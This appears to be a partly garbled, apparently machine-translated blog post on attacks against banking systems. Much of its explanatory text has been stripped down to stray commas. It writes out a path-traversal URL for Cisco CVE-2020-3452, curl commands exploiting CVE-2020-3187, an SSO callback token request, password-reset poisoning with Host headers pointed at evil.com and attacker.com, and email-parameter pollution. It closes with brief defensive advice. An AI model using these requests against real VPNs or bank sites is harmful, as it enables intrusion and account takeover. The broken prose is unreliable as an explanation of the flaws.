Hello friends!
Today we will talk about the pressing security problems of banking systems, we will analyze common vulnerabilities and draw conclusions based on current problems.
Important
Again, the author does not guarantee to show you how to fully protect your system from cyber threats, only wants to show what problems you should pay your attention to.
1. SSL VPN Services
Banks very often use Cisco SSL VPN services to organize remote access to their internal network
, .. Cisco CVE-2020-3452 CVE-2020-3187
1.1. CVE-2020-3452
CVE-2020-3452 - Cisco ASA FTD. , , , HTTP- .
https://bank.com/+CSCOT+/translation-table?type=mst&textdomain=/%252bCSCOE%252b/portal_inc.lua&default-language&lang=../
, .
1.2. CVE-2020-3187
/session_password.html 200
curl -k -s -i https://
Cisco-VPN/+CSCOE+/session_password.html
200? -
"/+CSCOU+/csco_logo.gif"
curl -k -H "Cookie: token=../+CSCOU+/csco_logo.gif" https://
Cisco-VPN/+CSCOE+/session_password.html
VPN .
2. & OAuth
- (SSO) OAuth 2.0, , , .
GET /auth/sso/cb?code=[sso token account] HTTP/1.1
Host: bank.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
CSRF . - .
SSO
SSO ,
.
SSO .
redirect_uri - url . / .
POST https://bank.com/reset.php HTTP/1.1
Accept: /
Content-Type: application/json
Host: evil.com
Host: bank.com
X-Forwarded-Host: attacker.com
Host: target.com
Host: attacker.com
email .
https://evil.com/reset-password.php?token=12345678-1234-1234-1234-12345678901
- . , .
.
POST /resetPassword
[…]
email=victim@email.com&email=attacker@email.com
In the request, you can see that the attacker simply duplicated the email parameter and indicated his mail to which the authorization token will be sent.
Output
Keep your services up to date, whether it's SSL VPN or GlobalProtect.
Keep Authentication Secure
Also as a tip, use a Web Application Firewall ( WAF ) to prevent exploitation of vulnerabilities caused by code changes.
Good luck! All the best.